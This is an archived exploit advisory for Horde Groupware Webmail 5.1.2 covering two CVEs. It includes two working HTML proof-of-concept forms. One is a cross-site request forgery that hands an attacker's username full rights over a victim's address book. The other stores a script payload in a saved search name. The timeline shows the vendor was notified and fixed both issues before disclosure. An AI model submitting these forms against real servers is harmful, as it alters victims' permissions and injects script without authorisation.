seeing is believing

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting
Posted Nov 4, 2013
Authored by Marcela Benetrix

Horde version 5.1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2013-6365, CVE-2013-6364
MD5 | 61a62e5a593fbb47e32c7273968288a7

Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
#############################
Exploit Title : CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF Location

Change of permissions functionality was found to miss unique token in the form.


##########################
PoC
<html>

<body>
<form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
<input type="hidden" name="actionID" value="editform" />
<input type="hidden" name="cid" value="37" />
<input type="hidden" name="app" value="turba" />
<input type="hidden" name="owner_input" value="kenedyK" />
<input type="hidden"
name="u_names[||new_input]"
value="AttackerUserName" />
<input type="hidden"
name="u_read[||new_input]" value="on" />
<input type="hidden"
name="u_edit[||new_input]" value="on" />
<input type="hidden"
name="u_delete[||new_input]" value="on" />
<input type="hidden" name="g_names[||new]"
value="" />
<input type="hidden" name="save_and_finish"
value="Save and Finish" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Preconditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them, he can launch the attack.

###########################
CVE identifier

CVE-2013-6365.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
#############################




Exploit Title : XSS and CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF/XSS Location

Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks.

##########################
POC

<html>
<body>
<form action="http://www.victim.com/horde/turba/search.php"
method="POST">
<input type="hidden" name="source" value="" />
<input type="hidden" name="criteria" value="" />
<input type="hidden" name="val" value="" />
<input type="hidden" name="search" value="Search" />
<input type="hidden" name="save_vbook" value="on" />
<input type="hidden" name="vbook_name"
value="<script>alert(1)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


###########################
CVE identifier

CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close